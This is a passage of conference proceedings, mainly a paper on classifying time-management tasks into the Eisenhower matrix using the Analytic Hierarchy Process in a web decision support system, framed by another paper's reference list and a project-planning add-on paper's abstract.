Intellectual Control of Mechanical Characteristics of Optical Products
127
3. Andriienko, O., Bilokin, S., Bondarenko, M.: Features of creation of multiprobe system for nanometric measurements of geometrical and mechanical properties of surfaces of microsystem devices. Mach. Technol. Mater. 14(6), 268–271 (2020) 4. Tytarenko, V., Tychkov, D., Bilokin, S., Bondarenko, M., Andriienko, V.: Development of a simulation model of an information-measuring system of electrical characteristics of the functional coatings of electronic devices. Math. Model. 2, 68–71 (2020) 5. Du, K.-L., Swamy, K.M.S.: Neural Networks and Statistical Learning. Springer, London (2014). https://doi.org/10.1007/978-1-4471-7452-3 6. Fedorov, E., Nechyporenko, O., Utkina, T.: Forecast method for natural language constructions based on a modified gated recursive block. In: CEUR Workshop Proceeding, vol. 2604, pp. 199–214 (2020) 7. Zhang, Z., Tang, Z., Vairappan, C.: A novel learning method for Elman neural network using local search. Neural Inf. Process. – Lett. Rev. 11(8), 181–188 (2007) 8. Dey, R., Salem, F.M.: Gate-Variants of Gated Recurrent Unit (GRU) Neural Networks 017. arXiv:1701.05923 (2017) 9. Cho, K., van Merrienboer, B., Gulcehre, C., Bougares, F., Schwenk, H., Bengio, Y.: Learning phrase representations using RNN encoder-decoder for statistical machine translation. In: Abstract of the Proceedings of the 2014 Conference on Empirical Methods in Natural Language Processing (EMNLP), Doha, Qatar (2014) 10. Maass, W., Natschläger, T., Markram, H.: Real-time computing without stable states: a new framework for neural computation based on perturbations. Neural Comput. 14(11), 2531– 2560 (2002) 11. Rotshtein, A., Shtovba, S., Mostav, I.: Fuzzy rule based innovation projects estimation. In: Proceedings Joint 9th IFSA World Congress and 20th NAFIPS International Conference, vol. 1220126, pp. 122–126 (2001) 12. Ruan, D.: Intelligent Hybrid Systems: Fuzzy Logic, Neural Networks, and Genetic Algorithm. Kluwer Academic Publishers, Boston (1997) 13. Abe, S.: Neural Networks and Fuzzy Systems: Theory and Application. Kluwer Academic Publishers, Boston (1997) 14. Tsoukalas, L.H., Uhrig, N.Y.: Fuzzy and Neural Approaches in Engineering. R.E. & Sons Inc., Chennai (1997) 15. Balochian, S., Ebrahimi, E.: Parameter optimization via cuckoo optimization algorithm of fuzzy controller for liquid level control. J. Eng. 2013, 1–7 (2013) 16. Talbi, El.-G.: Metaheuristics: From Design to Implementation. Wiley, New Jersey (2009) 17. Fedorov, E., Lukashenko, V., Utkina, T., Lukashenko, A., Rudakov, K.: Method for parametric identification of Gaussian mixture model based on clonal selection algorithm. In: CEUR Workshop Proceedings, vol. 2353, pp. 41–55 (2019) 18. De Castro, L.N., Von Zuben, F.J.: An evolutionary immune network for data clustering. In: Proceedings Sixth Brazilian Symposium on Neural Networks (2000) 19. Brownlee, J.: Clever Algorithms: Nature-Inspired Programming Recipes. Brownlee, Melbourne (2012)
Information and Communication Technology in Management
Combined Method of Solving Time Management Tasks and Its Implementation in the Decision Support System Anton Maksymov(B) and Yurii Tryus Cherkasy State Technological University, Cherkasy, Ukraine {a.ye.maksymov.asp21,tryus}@chdtu.edu.ua
Abstract. Among the methods of time management, the Eisenhower matrix is widely used, the essence of which is to divide the tasks into four degrees of importance – important-urgent, important-non-urgent, unimportant-urgent, unimportant-non-urgent. At the same time, it is sometimes quite difficult to determine exactly which of the categories the input task belongs to. Therefore, in these conditions, there is a need to create a method for classifying time management tasks according to the appropriate degrees of importance and a convenient weboriented tool to support decision-making that implements it. In the research, the authors propose to use the Analytic Hierarchy Process (AHP) to compare the input tasks of time management on the criteria of importance and urgency. The object of research is the methods of time management, in particular the “Eisenhower matrix”. The subject of research is the method of classification of input problems to the Eisenhower matrix by degrees of importance using the AHP. The proposed method is implemented in a web-oriented resource, which provides online automation of the process of classifying time management tasks. The obtained experimental results confirm the expediency of using the authors’ combination of the Eisenhower matrix method and the AHP to solve time management problems. Keywords: Time management · decision-making · Analytic Hierarchy Process · Eisenhower matrix · classification of tasks · information technology for decision making
1 Introduction Time is one of the most valuable human resources, and given its limitations and uniqueness, everyone should use it rationally. In this case, the science of time management comes to the rescue. Time management is the science of a set of methods and technologies for optimal organization of time and efficiency of its use to perform current tasks, projects and calendar events [1]. One of the popular approaches to solving time management problems is the Eisenhower matrix – a method that uses the principles of importance and urgency to prioritize and workload [1]. But the criteria for classifying problems in this case are © The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 E. Faure et al. (Eds.): ITEST 2022, LNDECT 178, pp. 131–146, 2023. https://doi.org/10.1007/978-3-031-35467-0_9
132
A. Maksymov and Y. Tryus
quite abstract, so it becomes relevant to use an additional mathematical apparatus for decision-making methods to determine the priorities of problems within each class. The goal of the research is to develop a method of classifying input problems to the Eisenhower matrix according to degrees of importance using the analytic hierarchy process, as well as creating a module for web-oriented decision support system that implements this method. Research Methods: Analysis of scientific and technical literature on the use of time management technologies using decision-making methods; analytic hierarchy process; Eisenhower matrix. Relevance of Research. In modern conditions of dynamic modernization and transformations it becomes necessary to increase the adaptability of the organization, the speed of response to changes in planning the list of tasks to be solved, and their appropriate classification according to certain criteria. In this case, adaptability is an important factor in the competitiveness of a person who plans his schedule. An important role is played by information technology, with the use of which it is possible to automate the relevant decision-making processes in solving time management problems. Analysis of Recent Research and Publications. The problem of time management is always relevant. The works of such scientists as S. Covey, K. Bischof, R. Kiyosaki, A. Gast, P. Drucker, L. Seiwert, J. Cawley, K. Muller, T. Peters, F. Taylor, J. Knoblauch are devoted to the development and implementation of time management methods and technologies in the practice of organizations and enterprises [2]. We also highlight the publications of recent years which are devoted to the problems of building a system of time management by such authors as Ch. Godefroy [3], G. Campbell [4], R. Davis [5], S. Gopi [6]. Ukrainian scientists also actively study the problems of time management. In particular, O.V. Kendiukhov and K.Iu. Yahelska [7] studied the economic meaning of time and the role of the time factor in the development of the economic system. H.I. Yevtushenko and V.M. Derevianko [8] investigated the main causes of time loss and provided suggestions for improving the efficiency of time management. M.M. Petrushenko and T.V. Bondar [9] proposed an author’s approach to the implementation of a corporate time management system. K.B. Kharuk, R.M. Skrynkovskyi, N.M. Krukevych [10] studied the problems of formation of the concept of “time management” and proposed tools for diagnosing time management on the basis of business indicators “efficiency” and “productivity”. H.I. Pysarevska [11] substantiated the methods of time inventory. N.V. Iziumtseva and V.V. Nedozhdii [12] considered the stages of building a time management system at the enterprise, and also justified the need for monitoring of working time. S.M. Makarenko, N.M. Oliinyk and K.I. Lushchyk [13] presented recommendations for improving time management and determining the optimal workload for employees. The combination of the analytic hierarchy process and the Eisenhower matrix is found in scientific papers in terms of allocating auxiliary matrices (sub-quadrants) for the main Eisenhower matrix using AHP with subsequent calculations [14]. The scientific work on combining AHP and Simple Additive Weighting (SAW) methods for use in a decision support system based on the Eisenhower matrix to solve the problem of task accumulation, but using its own criteria for evaluating tasks, was analyzed [15]. The
Combined Method of Solving Time Management Tasks and Its Implementation
133
research also analyzed the work using benefit, opportunity, cost, risk (BOCR) analysis and AHP to the Eisenhower matrix [16]. The authors’ work proposes a simplified but no less effective approach without highlighting auxiliary matrices and sub-criteria of the hierarchy. Instead, a method for classifying input problems into four classes of the Eisenhower matrix is proposed.
2 Materials and Methods Decision-making is a special type of human activity aimed at choosing the best course of action among many other options. Options are called alternatives. The choice of the best alternative is based on certain criteria [17]. The decision-making task (DMT) is a task that can be formulated in terms of “goals”, “means”, “results” [17]. The decision-making task called a pair , where A is the set of acceptable alternatives, K is the set of optimality criteria, which defines the concept of the best alternatives (K is the goal model). The solution of the problem is a subset Aop ∈ A, which is determined by the principle of optimality. In that case if the principle of optimality is a set of contradictory criteria, one speaks about a multi-criteria task of decision-making. The classification of the DMT is carried out in two aspects [17]: 1. classification according to the description of the purpose of the DMT; 2. classification by description of means, results and connections between them. An important result of research conducted within the normative theory of decisionmaking is the development of mathematical models that can find a solution to the problem [18]. The mathematical model of DMT is a formal description of the elements that make it up (goals, means, results), as well as the relationship between means and results. In the case where the decision-making task can be presented using a hierarchical composition and apply the rating of alternative solutions, it is advisable to use the Analytic Hierarchy Process – a mathematical tool of a systematic approach to solving complex decision-making problems. This method was developed by the American mathematician Thomas Saaty [19]. The AHP is widely used in practice and actively developed by scientists around the world, and a large number of software products have been developed that implement it. Along with mathematics, it is based on psychological aspects. The AHP allows to structure a complex decision-making problem in a clear and rational way through a hierarchy (Fig. 1), compare and quantify alternative solutions [19]. Therefore, the analytic hierarchy process is a systematized mathematical procedure for the hierarchical representation of the elements that determine the essence of the decision-making problem [19]. The method consists in decomposing the problem into simpler components and further processing the sequence of judgments of the subject of decision-making, presented in the form of pairwise comparisons. The task of classification is a formalized problem that contains many objects (situations) which need to be divided in some way into classes that, in the classical case, do not intersect [20].
134
A. Maksymov and Y. Tryus
Fig. 1. Hierarchy of AHP
Formulation of the Problem. Let the problems of time management be represented by a set of alternatives A = {a1 , a2 , …, an }. These problems must be divided into m classes C 1 , C 2 , …, C m using the set of criteria K = {k 1 , k 2 , …, k m }. According to the Eisenhower matrix method, K is the set of degrees of importance of problems [1], the number of which in the classical method is equal to m = 4. Accordingly, the decision maker (DM) uses the following criteria to evaluate the tasks: k 1 – importanturgent tasks (tasks that require immediate solution), k 2 – important-non-urgent tasks (tasks that need to be assigned at a later date), k 3 – unimportant-urgent tasks (tasks that should be delegated to others), k 4 – unimportant-non-urgent tasks (tasks that need to be postponed or deleted altogether). If the number of problems in the set A is more than 4, then to determine the priority of these problems it is advisable to use the analytic hierarchy process [19], and these criteria have equal weight in the evaluation of problems. To solve this problem, project management experts can be involved, who compare and evaluate alternatives according to criteria, using the Saaty scale [19]. The Solution of the Problem. Consider the method of solving the classification problem for time management problems, which uses AHP according to the criteria of the Eisenhower method to determine the priorities of each class. Since the criteria k i (i = 1, 2, 3, 4) are equivalent (the matrix of paired comparisons is single), their comparison by AHP is not performed. Therefore, first, alternatives from the set A are compared according to the k 1 criterion – “important-urgent tasks” and analyzed for their inclusion in the class of tasks C 1 according to such a procedure. Let Q be the value of the weight from the interval (0; 1), which determines the inclusion of alternative aj to the corresponding class of problems C i by the criterion k i (i = 1, 2, 3, 4), i.e., if in the priority vector (i)
W (i) = (wj )j=1,n ,
Combined Method of Solving Time Management Tasks and Its Implementation
135 (i)
obtained by AHP when comparing alternatives [19], the corresponding value wj > Q, (i)
then the alternative aj gets into the class of problems C i with priority wj and is removed from further analysis by other criteria; otherwise, the alternative aj remains in the set of alternatives (tasks) for further comparison by the following criterion k i+1 (i = 1, 2, 3). By default, the parameter Q is 0.25, because there are 4 equivalent criteria (Q = 1/4 = 0.25), but the value of this parameter can be changed between [0.25; 1) to raise the lower threshold for the inclusion of alternatives to a certain class of problems C i (corresponding to the square of the Eisenhower matrix) (i = 1, 2, 3, 4). With the calculated weights, the priority tasks for the execution of the Eisenhower matrix in each square are selected, which, in turn, gives an understanding of the importance of each task within the corresponding class. Formally, using the described procedure, the set of alternatives A = {a1 , a2 , . . . , an } is divided into classes of problems of the form: (i) (i) Ci = a1 , a2 , . . . , as(i) , i = 1, . . . , 4, i so A=
(i)
where aj
4 i=1
Ci ,
Ci ∩ Cj = ∅, i = j, i, j = 1, . . . , 4, (i) (i) ≥ Q, j = 1, . . . , si , 4i=1 si = n, w aj – the priority value ∈ A, w aj (i)
of the alternative aj in the priority vector W (i) of the matrix of paired comparisons of alternatives by criterion ki , i = 1, . . . , 4. The above procedure allows to more accurately classify tasks in the Eisenhower matrix, as well as to prioritize them, which facilitates the work of DM in the distribution of time management tasks. Let’s consider in more detail the main stages of the proposed combined method for solving the time management problem. Stage 0. Set Q = 0.25, Ci = ∅, i = 1, 4. This value can be changed on the interval [0.25; 1) to raise the lower threshold for the inclusion of alternatives to a certain class of problems C i . Stage 1. Compare alternatives (tasks) from the set A by criterion k 1 – “importanturgent tasks” by the analytic hierarchy process and analyze them for inclusion in the class of problems C 1 according to the procedure below. Step 1. Fill in the quadratic matrix of pairwise comparisons M in terms of dominance of one alternative (task) over others on the Saaty scale, i.e. dominance is expressed in integers on a nine-point scale or in numbers inverted to them. The square matrix of pairwise comparisons M is filled in according to the following rule. If alternative ai dominates alternative aj , where i = j, then the matrix cell corresponding to row ai and column aj is filled with the integer aij , and the cell corresponding to the row aj and the column ai is filled with the inverse number 1/aij . If, on the contrary, alternative aj dominates over alternative ai , then the integer aji is placed in the cell corresponding to row aj and column ai , and fraction 1/aji is placed in cell corresponding to
136
A. Maksymov and Y. Tryus
row ai and column aj . If the alternatives ai and aj are equivalent, then in the symmetric cells of the matrix they have 1. To obtain a matrix of pairwise comparisons, the DM or an expert makes n(n − 1)/2 estimates (here n is the matrix dimension of pairwise comparisons). In this case, the matrix M is obtained. ⎛
1 a12 ⎜ 1/a12 1 M =⎜ ⎝ ··· ··· 1/a1n 1/a2n
⎞ · · · a1n · · · a2n ⎟ ⎟ ··· ···⎠ ··· 1
Set M k1 = M. Step 2. Ranking of alternatives (tasks) by priority, analyzed using a matrix of pairwise comparisons, is based on the analysis of the main eigenvectors of the matrix of pairwise comparisons. The main eigenvector provides ordering of alternatives by priorities, and the eigenvalue is a measure of the consistency of the expert’s judgments. Calculation of the main eigenvector W of a positive square matrix E based on the solution of the matrix equation: MW = λmax W , ⎞ w1 ⎜ w2 ⎟ ⎟ where W = ⎜ ⎝ . . . ⎠ – the main eigenvector of the matrix M, which corresponds to λmax wn – the maximum eigenvalue of the matrix M among its eigenvalues, i.e. the numbers λ, which are the roots of the characteristic equation of the form: det(M − Eλ) = 0, where E is identity matrix. If the eigenvector W is normalized (the sum of its elements is 1), then it is a priority vector for the matrix M. If the eigenvector W is non-normalized, it must be normalized. To do this, find the sum of all its elements and form a new vector W , the elements of which are the ratio of the elements of the vector W to the found sum: wi W = (wi )i=1,n , where wi = n . i=1 wi ⎛
Let the normalized priority vector of alternatives (tasks) be found according to the described procedure of paired comparisons by criterion k 1 : (1)
W (1) = (wi )i=1,n . Step 3. Using the analytic hierarchy process for the matrix of paired comparisons M, the value of the consistency of the expert’s assessment is calculated based on the CR indicator – the consistency ratio of the matrix of paired comparisons M, which indicates how consistent the expert’s assessment about the objects of comparison is: CR = CI /M (CI ),
Combined Method of Solving Time Management Tasks and Its Implementation
137
where • CI = (λmax – n)/(n – 1) – consistency index of the matrix of paired comparisons, n – the number of elements that are compared with each other; λmax – the maximum eigenvalue of the matrix of paired comparisons M; • M(CI) – the average value (expected value) of the consistency index of a randomly composed matrix of pairwise comparisons on a scale from 1 to 9 of the inversely symmetric matrix with the corresponding inverse values of the elements, based on experimental data (Table 1).
Table 1. The average value of the consistency index M(CI) Dimension 1 M(CI)
Dimension 9 M(CI)
2
3
4
5
6
7
8
0.00 0.00 0.58 0.90 1.12 1.24 1.32 1.41 10
11
12
13
14
15
1.45 1.49 1.51 1.48 1.56 1.57 1.59
The value of CR is considered acceptable if it does not exceed 0.1. Therefore, if CR ≤ 0.1, then the matrix of paired comparisons M is considered consistent, and there is a transition to step 4. Otherwise, the matrix of paired comparisons M is considered inconsistent, and the expert must return to step 1 and repeat the comparison procedure. (1) Step 4. For each alternative ai ,i = 1, n, the values of its priority wi are analyzed. If (1) the corresponding value wi ≥ Q, then the alternative ai gets into the class of problems (1) C 1 with priority wi , ie C1 = C1 ∪ {ai } and is removed from further analysis by other criteria: A = A\{ai }. Otherwise, alternative ai remains in the set of alternatives (tasks) A for further comparison by the following criterion k 2 . As a result of this procedure, the following objects are obtained: • M k1 – consistent matrix of pairwise comparisons of alternatives from set A; (1) • W (1) = (wi )i=1,n – normalized priority vector of alternatives (tasks) by criterion k1; (1) (1) (1) (1) • C1 = a1 , a2 , . . . , as1 – a class of tasks by criterion k 1 , i.e. for which wi ≥ Q, i = 1, s1 ; • A1 = A\C1 – a set of alternatives (tasks) not included in the class of tasks C 1 . Stage 2. Compare alternatives from the set A1 by criterion k 2 – “important-nonurgent tasks” and analyze them for inclusion in the class of tasks C 2 according to the procedure similar to that described in stage 1. As a result, the following objects are obtained: • M k2 – consistent matrix of pairwise comparisons of alternatives from the set A1 = A\C 1 ; (2) • W (2) = (wi )i=1,n1 – normalized priority vector of alternatives (tasks) by criterion k 2 , where n1 is the number of alternatives (tasks) remaining in the set A1 ;
138
A. Maksymov and Y. Tryus
(2) (2) (2) (2) • C2 = a1 , a2 , . . . , as2 – a class of tasks by criterion k2 , i.e. for which wi ≥ Q, i = 1, s2 ; • A2 = A1 \C2 – a set of alternatives (tasks) not included in the class of tasks C 1 and C2. Stage 3. Compare alternatives from the set A2 by criterion k 3 – “unimportant-urgent tasks” and analyze them for inclusion in the class of tasks C 3 according to the procedure similar to that described in stage 1. As a result, the following objects are obtained: • M k3 – consistent matrix of pairwise comparisons of alternatives from the set A2 ; (3) • W (3) = (wi )i=1,n2 – normalized priority vector of alternatives (tasks) by criterion k 3 , where of alternatives (tasks) remaining in the set A2 ; n2 is the number (3) (3) (3) (3) • C3 = a1 , a2 , . . . , as3 – a class of tasks by criterion k3 , i.e. for which wi ≥ Q, i = 1, s3 ; • A3 = A2 \C3 – a set of alternatives (tasks) not included in the class of tasks C 1 , C 2 and C 3 . Stage 4. If there is only one problem left in the set A3 , then it automatically gets into the category of tasks k 4 – “unimportant-non-urgent tasks”, i.e. to the class of tasks C 4 . If there is more than one task left in the set A3 , then it is necessary to compare the alternatives from the set A3 by criterion k 4 – “unimportant-non-urgent tasks” in steps 1, 2 and 3 and include them all in the class of tasks C 4 . As a result, the following objects are obtained: • if the number of tasks in the set A3 is more than one: M k4 – consistent matrix of (4) pairwise comparisons of alternatives from set A3 ; W (4) = (wi )i=1,n3 – normalized priority vector of alternatives (tasks) by criterion k 4 , where n3 is the number of alternatives (tasks) remaining in the set A3 ; (4) (4) (4) • C4 = a1 , a2 , . . . , as4 – a class of tasks by criterion k 4 . The result of this procedure is the division of the set of alternatives (tasks) A into classes of alternatives (tasks) C 1 , C 2 , C 3 , C 4 , corresponding to the specified criteria k 1 , (i) (i) k 2 , k 3 , k 4 , while for each task aj of each class the priority value wj ≥ Q is known. The following describes the software implementation of this method within the creation of a decision support system developed by the authors.
3 Experiments Most of the well-known decision support systems use the analytic hierarchy process as a theoretical basis for decision-making in a variety of situations, from intergovernmental management to sectoral and private issues in business, industry, health and education. These include, for example, systems “Expert Choice” [21], “Super Decisions” [22], “Decision Lens” [23]. Decision support system (DSS) is an interactive computer automated system (software package) designed to help and support various human activities in making decisions regarding the solution of bad structured or unstructured problems [17].
Combined Method of Solving Time Management Tasks and Its Implementation
139
The users of DSS are usually managers or staff members (e.g. a financial planner) of an enterprise, IT company, firm, institution, etc. A staff member can use the system for his/her own purposes, or serve as an intermediary (i.e., a system operator) for the manager. People can play different roles in the decision-making process. The person who actually chooses the best course of action is called the decision maker (DM). In addition to DM, other people are involved in the decision-making process: the owner of the problem, experts, analysts and active groups. In addition, the DM environment, employees of the organization on whose behalf the DM makes decisions, are implicitly involved in decision-making [18]. The concept of interactivity is key and is based on the position that at each stage of the decision-making process, the DSS should provide the DM with the necessary and sufficient information, presented in the right form and available at any time and in any place where the Internet is available [17]. This can be achieved by creating a web-oriented system [18]. An example of structural implementation of such a system is shown in Fig. 2.
Fig. 2. Structural implementation of web-oriented system
For the software implementation of the proposed method for solving the problem of classifying time management tasks, which combines the analytic hierarchy process and the Eisenhower matrix method, the authors created a web-oriented resource that is an integral part of the DSS “Decisioner” [24]. To develop this resource, programming languages and technologies shown in Fig. 3 are used.
Fig. 3. Logos of programming languages and implementation technologies in the project
140
A. Maksymov and Y. Tryus
For developing DSS, PHP is used to query the MySQL database. Also, this programming language is used to distribute access among users depending on their role. JavaScript without frameworks is used to implement decision-making methods in DSS. Actually, in order for JavaScript and PHP to interact with the user, standard HTML5 and CSS3 tools were chosen for visual design. Input data to the decision-making task solved with the AHP: • The goal – a brief description of the task that constitutes the first level of the hierarchy. The goal in this context often begins with the words: plan, distribute tasks, etc. For example: plan a working day, distribute tasks by degrees of importance. • Criteria – a quantitative or qualitative characteristic that is essential for judging an object (alternative). In the case of the Eisenhower matrix, the number of criteria should be 4 according to the names of the quadrants. Criteria are the second level of the hierarchy. • Alternatives – objects to choose from, in our case inputs for planning. Alternatives are the third level of the hierarchy. In DSS “Decisioner” DM can specify from 4 to 15 alternatives. The reason for this limitation is that the table of random consistency index values for the consistency index (CI) in the AHP contains values only to the matrix 15 dimension [19]. Consider an example where the necessary time management tasks are entered as alternatives using the web interface of the DSS “Decisioner” (Fig. 4), while the criteria are entered automatically in accordance with the Eisenhower matrix method [1]. At each stage of pairwise comparisons by the analytic hierarchy process, the value of consistency of expert assessments is automatically calculated (see stage 1, step 3). Accordingly, a field was created to notify the user of the value of the consistency ratio (CR). In the case of acceptable consistency of estimates, this field displayed the following message: “The comparison matrix is consistent because CR ≤ 0.1. Estimates do not need to be clarified” (Fig. 5). Otherwise, the user received the following message: “The comparison matrix is badly consistent because CR > 0.1. Comparison estimates should be changed” (Fig. 6). Since the criteria in the task are equivalent, their comparison is not carried out. Therefore, at the next step, alternatives are compared according to the criterion k 1 – important-urgent tasks. An example of comparing input tasks according to this class is shown in Fig. 7. According to the results of the comparison of tasks with each other according to the criterion “Important-urgent tasks”, such tasks were a module for the program” and “Add (1) ≥ Q = 0.25. Accordingly, these “Test the new module”, because their weights w aj tasks are not included in the following comparisons. With the help of calculated weights, priority tasks are highlighted for execution in each Eisenhower square, which, in turn, gives an understanding of the importance of tasks. (1) In this case, the task “Add a module for the program” has a higher priority (w a1 = (1) 0.3566) in the implementation over the task “Test the new module” (w a2 = 0.2774), so its execution is a priority.
Combined Method of Solving Time Management Tasks and Its Implementation
141
Fig. 4. Input data for the task of time management in DSS “Decisioner”
Fig. 5. Example of notifying the user about good consistency of estimates
Fig. 6. Example of notifying the user about poor consistency of estimates
At the next step, the remaining alternatives are compared according to the criterion k 2 – “important-non-urgent tasks” (Fig. 8).
142
A. Maksymov and Y. Tryus
Fig. 7. Comparison of alternatives to criterion k 1 using DSS “Decisioner”
According to the results of comparing tasks with each other according to the criterion “Important-non-urgent tasks”, such tasks appropriate weights were “Update with (2) = 0.4464) and “Create own blog” the version of the program on the site” (w a1 (2) (w a2 = 0.2706). At the next step, the remaining alternatives are compared according to the criterion k 3 – unimportant-urgent tasks (Fig. 9). According to the results of the comparison of tasks with each other according to the criterion “Unimportant-urgent tasks”, such tasks with appropriate were “Share weights (3) (3) articles in chat” (w a1 = 0.5638) and “Reply to emails” (w a2 = 0.2634).
Combined Method of Solving Time Management Tasks and Its Implementation
143
Fig. 8. Comparison of alternatives by criterion k 2
Fig. 9. Comparison of alternatives by criterion k 3
Accordingly, two tasks remain in the list of tasks. In the case when only one task remains at a certain step – it automatically gets into the next category of tasks k 4 – unimportant-non-urgent tasks. In the case when more than one task remains, it is possible not to compare tasks according to the k 4 criterion and leave the matrix filled with ones. Or DM might compare these tasks to determine their priority in the execution sequence (Fig. 10).
144
A. Maksymov and Y. Tryus
Fig. 10. Comparison of alternatives by criterion k 4
With the help of the calculated weights, the priority tasks to be performed in the Eisenhower square “Unimportant-non-urgent tasks” are identified, which, in turn, gives an understanding of the importance of the tasks. case, the task “Watch the video course about design” has a higher priority In this (4) (4) (w a1 = 0.8) in the implementation over the task “Sort mail spam” (w a1 = 0.2), so its execution is a priority.
4 Results With the help of the created web-resource the user (DM, expert) enters in the offered template the list of necessary tasks as alternatives, thus criteria from set K are already entered into a template according to the Eisenhower matrix method. Further, after the stage-by-stage filling of alternatives comparison matrices for the corresponding criteria, the user receives the completed Eisenhower matrix indicating the priority of tasks in each class (Fig. 11).
Fig. 11. Filled Eisenhower matrix using the DSS “Decisioner”
Combined Method of Solving Time Management Tasks and Its Implementation
145
5 Discussion The research proposes a new method for solving the problem of classifying time management tasks, which combines the analytic hierarchy process and the Eisenhower matrix method. Through this combined method, the user is given the opportunity to evaluate tasks as alternatives according to criteria corresponding to the classification of tasks in the Eisenhower matrix. As a result, the input tasks are divided into four classes of the Eisenhower matrix, and the priorities for the tasks of each class are determined in numerical equivalent. As a recommendation for decision-making, the sequence of tasks obtained in accordance with their importance and priority is given. The advantages of the proposed method include the ability to automate the process of distribution of tasks according to the criteria of importance, as well as obtaining numerical weight values of the priorities of the tasks. The disadvantages of this method include the additional time spent by the user on a pairwise comparison of tasks according to the AHP. However, with the help of information technologies, this process is partially automated, which significantly speeds it up and makes it expedient.
6 Conclusions As a result of the research, a combined method has been proposed for classifying time management tasks, combining the analytic hierarchy process and the Eisenhower matrix method, and a module for a web-oriented decision support system has been created that provides online automation of the process of classifying input tasks for the Eisenhower matrix according to degrees of importance and priority of execution. The obtained experimental results confirm the expediency of using the authors’ approach to the classification of time management tasks, which uses a combination of the Eisenhower matrix method and the analytic hierarchy process. The proposed and researched method should be used in the case when numerical calculations are needed to confirm the result of task analysis, or when it is necessary to analyze relatively equivalent problems, in assessing which it is necessary to mathematically justify the sequence of their implementation. Prospects for further scientific research on the topic of the article are associated with the application of the analytic hierarchy process to solving classification problems, in particular in the field of project management. Accordingly, it is necessary to adapt the proposed combined method for the number of criteria k > 4 and alternatives m > 15, to investigate the process of selecting the parameter Q and the influence of the weight of the criteria in case of their inequality. There are also plans to supplement the functionality of the “Decisioner” web resource with the possibility of applying group expertise with the aggregation of assessments of several experts.
References 1. Forsyth, P.: Successful Time Management. Kogan Page Publishers, London (2013)
146
A. Maksymov and Y. Tryus
2. Skryhun, N., Nyzhnyk, S.: Time management as an important component of successful business activities. Middle Eur. Sci. Bull. 2, 13–15 (2020). https://doi.org/10.47494/mesb.2020. 2.13 3. Godefroy, Ch.: The Complete Time Management System. Positive Club, New York (2016) 4. Campbell, G.: Time Management: The 8 Laws of Time Management. CreateSpace Independent Publishing Platform, New York (2017) 5. Davis, R.: Time Management: How to Find the Time and Motivation to be Productive and Get Things Done. CreateSpace Independent Publishing Platform, New York (2017) 6. Gopi, S.: Time Management: Step by Step Skill. Development Guide to Increase Productivity, Focus and End Procrastination, Nashville (Indiana) (2016) 7. Kendiukhov, O., Yahelska, K.: An economic approach to the study of time. Marketynh i Menedzhment Innovatsii 3, 141–148 (2012) 8. Yevtushenko, H., Derevianko, V.: Analysis of the state of working time management and ways to increase the effectiveness of the use of “Time Management” in the organization. Zbirnyk Naukovykh Prats Natsionalnoho Universytetu Derzhavnoi Podatkovoi Sluzhby Ukrainy 1, 88–96 (2014) 9. Petrushenko, M., Bondar, T.: Time management as a means of achieving strategic development of the enterprise. Visnyk Sumskoho Derzhavnoho Universytetu. Seriia “Ekonomika” 1, 10–18 (2009) 10. Kharuk, K., Skrynkovskyi, R., Krukevych, N.: Diagnostics of time management of enterprises on the basis of business indicators: efficiency and productivity. Ekonomika ta Derzhava 1, 56–59 (2015) 11. Pysarevska, H.: The use of time management to improve the efficiency of personnel management. Naukovyi Visnyk Khersonskoho Derzhavnoho Universytetu. Seriia “Ekonomichni nauky” 20(1), 148–153 (2016) 12. Iziumtseva, N., Nedozhdii, V.: Time management as the basis of effective functioning of a modern enterprise. Infrastruktura Rynku: elektronnyi naukovo-praktychnyi zhurnal 25, 305– 309 (2018). http://dspace.ubs.edu.ua/jspui/handle/123456789/1696 13. Makarenko, S., Oliinyk, N., Lushchyk, K.: Determination of the optimal production load as a basis for increasing the productivity of the company’s employees. Naukovyi Visnyk Mizhnarodnoho Humanitarnoho Universytetu. Seriia “Ekonomika i Menedzhment” 26(2), 51–54 (2017) 14. Mfondoum, N., Homere, A., Tchindjang, M., Mfondoum, V., Makouet, I.: Eisenhower matrix * Saaty AHP = Strong actions prioritization? Theoretical literature and lessons drawn from empirical evidences, vol. II, pp. 13–27 (2019) 15. Ap, D., et al.: Indonesia corresponding. Application of Eisenhower matrix and analytic hierarchy process for decision support system with the SAW method. Int. J. Innov. Res. Growth 2, 147–152 (2021) 16. Rafke, H., Lestari, Y.: Simulating fleet procurement in an Indonesian Logistics Company. Asian J. Shipping Logistics 33, 1–10 (2017). https://doi.org/10.1016/j.ajsl.2017.03.001 17. Sytnyk, V.: Decision Support Systems. KNEU, Kyiv (2009) 18. Holsapple, C.: Decisions and knowledge. In: Handbook on Decision Support Systems 1. International Handbooks Information System. Springer, Heidelberg (2008). https://doi.org/ 10.1007/978-3-540-48713-5_2 19. Saaty, T.: The Analytic Hierarchy Process: Planning, Priority Setting Resource Allocation. McGraw-Hill International Book Company, New York (1980) 20. Alpaydin, E.: Introduction to Machine Learning, 2nd edn. MIT Press, Cambridge (2010) 21. AHP Software for Decision Making and Risk Assessment. https://expertchoice.com 22. Super Decisions—Homepage. http://www.superdecisions.com 23. Decision Lens—Portfolio and Budget Planning. https://www.decisionlens.com 24. Decisioner DSS. https://dss.tg.ck.ua
Information Technology in Intelligent Computing
Development of the Concept of Intelligent Add-On over Project Planning Instruments Iurii Teslia1 , Oleksii Yegorchenkov2 , Iulia Khlevna2 , Nataliia Yegorchenkova3 , Yevheniia Kataeva1 , Andrii Khlevny2 , and Ganna Klevanna1(B) 1 Cherkasy State Technological University, Cherkasy, Ukraine
[email protected] 2 Taras Shevchenko National University of Kyiv, Kyiv, Ukraine 3 Slovak Technical University in Bratislava, Bratislava, Slovak Republic
Abstract. The necessity of intellectualization of project planning processes is shown. The principles and tasks of intellectualization of the project planning process are formulated. The concept of intelligent add-on over project management software tools is proposed, which includes the principles, approach, structure, model and tools of project planning. Stages and tasks of project planning with the use of intelligent add-on are highlighted. The structure of intelligent project planning technology has been developed. It is proposed to use a modified reflex method to implement an intelligent add-on to MS Project or Oracle Primavera P6 tools. The model of development of reactions to the flow of input data on the project plan in the intelligent add-on is proposed. The developed concept and means of the intelligent add-on have passed experimental and practical testing on real projects and shown their effectiveness in project planning. Keywords: Project planning · software add-ons · artificial intelligence systems · reflective intelligent systems
